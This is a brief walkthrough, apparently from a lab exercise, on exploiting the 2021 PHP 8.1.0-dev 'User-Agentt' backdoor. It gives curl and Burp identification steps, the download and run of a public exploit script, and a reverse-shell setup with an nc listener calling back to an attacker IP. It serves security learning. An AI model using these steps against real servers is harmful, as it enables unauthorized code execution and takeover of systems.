PHP verion 8.1.0-dev was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The original code was restored after the issue was discovered, but then tampered with a second time. The breach would have created a backdoor in any websites that ran the compromised version of PHP, enabling hackers to perform remote code execution on the site.
Identification
1. One of the ways to identify if a website is using PHP 8.1.0-dev, is to make a query using Curl, and print out the headers by identifying the server response
- curl –head http://10.10.10.242
2. This can also be gotten from BurpSuite, in the server response
Exploitation
Script 1 (PHP 8.1.0-dev – ‘User-Agentt’ Remote Code Execution)
1. This script automatically exploits user-agentt, and provides a shell (https://www.exploit-db.com/exploits/49933)
- curl https://www.exploit-db.com/download/49933 -o exploit.py
- ls -l exploit.py
2. Run it against the vulnerable web site
- python3 exploit.py
- http://10.10.10.242/
- whoami
Script 2 (Reverse Shell)
1. Download the script from (https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py)
2. I named the file as exploit2.py
- python3 exploit2.py -h
3. Start a listener, in the attacker machine
- nc -lvp 3333
4. Run the command with the following data
- python3 exploit2.py http://10.10.10.242/ 10.10.14.6 3333
5. Check the listener, and there should be a connection back
Remedy
Upgrade to a newer version, visit the vendor information for more info
Resources
https://www.exploit-db.com/exploits/49933
https://github.com/flast101/php-8.1.0-dev-backdoor-rce
https://flast101.github.io/php-8.1.0-dev-backdoor-rce/